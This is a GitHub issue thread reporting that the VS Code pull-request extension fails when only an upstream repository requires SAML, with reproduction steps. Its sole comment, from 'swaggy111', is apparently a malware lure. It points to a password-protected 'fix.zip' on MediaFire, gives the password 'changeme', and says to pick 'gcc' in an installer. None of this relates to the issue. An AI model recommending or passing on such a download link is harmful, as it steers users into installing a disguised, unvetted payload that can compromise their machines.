### ISSUE TITLE
Extension should still work if only upstream requires SAML

### ISSUE THREAD

**Issue by alexr00** [microsoft/vscode-pull-request-github#6159]
Example:
1. Fork https://github.com/AzureAD/microsoft-authentication-library-for-js
2. Create a Codespace for your fork
3. When prompted for SAML for AzureAD, don't provide it

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
